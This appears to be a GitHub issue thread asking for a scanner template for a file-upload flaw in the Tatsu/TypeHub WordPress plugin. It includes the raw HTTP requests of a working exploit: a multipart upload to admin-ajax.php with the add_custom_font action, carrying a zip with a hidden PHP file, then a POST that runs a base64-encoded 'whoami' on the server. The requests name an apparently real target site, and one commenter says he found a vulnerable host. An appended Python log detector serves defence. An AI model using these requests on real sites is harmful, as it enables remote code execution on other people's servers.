Open akincibor opened 2 years ago
@akincibor I checked the plugin; it seems to be a paid version https://tatsubuilder.com/
Let me know if I'm wrong
Hi @DhiyaneshGeek
The first request uploads a zip file (example.zip) containing a PHP file (.examplephp.php):
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 509
Content-Type: multipart/form-data; boundary=5e77a7410a108fe824da522d90cb1200
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="action"
add_custom_font
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="file"; filename="example.zip"
PK\x03\x04\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00.examplefile.php\xb3\xb1/\xc8(PPIS\xb0UP\xca\xc9M\xad,.Q\xb2vPI\xb4\x05\nE\x9b\xc4\xea\x01Ic0\ta\x9b\x82I#0i\x18\x0bTX\x9e_\x94R\x0c\xd4\x9bXT\x94X\xa9\x91\x94X\x9cjf\x12\x9f\x92\x9a\x9c\x9f\x92\xaa\xa1\x12\x1f\xe0\x1f\x1c\x12\xad^\x92ZQ\xa2\x1e\xab\xa9i\xad\x92e\xab\x04V\xa8\xa4\xa7\x14\x0f\xc4i\x999%\xa9E \xfb \xac\xd4\x94x\x98y*Y\x1a\x10\xb3u\x14T\x125\xad\x1dJ\xf3r2\xf3\xb25\xe2\xe3\xdd<}\\\xe3\xe35\xad\x01PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00.examplefile.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x008\x00\x00\x00\xba\x00\x00\x00\x00\x00
--5e77a7410a108fe824da522d90cb1200--
It should be uploaded to the endpoint /wp-content/uploads/typehub/custom/example/.examplefile.php
The second request is:
POST /wp-content/uploads/typehub/custom/example/.examplefile.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
text=d2hvYW1p
d2hvYW1p is base64(whoami)
I think I found a vulnerable host, check Discord
Hi,
Can someone help me convert this Python PoC into a template?
https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd
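For defenders, the two requests described in this thread leave a recognisable trace in web server access logs: a request for a PHP file under /wp-content/uploads/typehub/custom/, a directory that should only serve font files. The following is an added example, not part of the thread or of any project's code, that flags such requests in Combined Log Format lines. The function name, the extension list and the sample log lines are assumptions; access logs do not record POST bodies, so the `add_custom_font` action itself is not visible and the correlation with admin-ajax.php is by client IP only.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Directory the thread says the uploaded zip is extracted into.
FONT_DIR = "/wp-content/uploads/typehub/custom/"
# Extensions commonly mapped to the PHP handler (assumed list; adjust to your server).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
AJAX = "/wp-admin/admin-ajax.php"


def find_font_dir_php_hits(lines):
    """Return one finding per request for a PHP file under the font directory."""
    ajax_posters = set()  # client IPs that POSTed to admin-ajax.php earlier in the log
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = unquote(urlsplit(m["target"]).path)  # drop query string, decode %xx
        if m["method"] == "POST" and path == AJAX:
            ajax_posters.add(m["ip"])
        elif path.startswith(FONT_DIR) and PHP_EXT.search(path):
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                "status": int(m["status"]),  # 200 means the file exists and was served
                "hidden_file": path.rsplit("/", 1)[-1].startswith("."),
                "after_ajax_post": m["ip"] in ajax_posters,
            })
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "curl"',
    '203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "POST /wp-content/uploads/typehub/custom/example/.examplefile.php HTTP/1.1" 200 12 "-" "curl"',
    '198.51.100.9 - - [01/Jan/2024:10:05:40 +0000] "GET /wp-content/uploads/typehub/custom/roboto/roboto.woff2 HTTP/1.1" 200 18000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:06:10 +0000] "GET /wp-content/uploads/typehub/custom/x/%2Ehidden.PHP?a=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_font_dir_php_hits(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 warrants checking the directory on disk for PHP files, including dotfiles; a 404 indicates probing for a file that is not present.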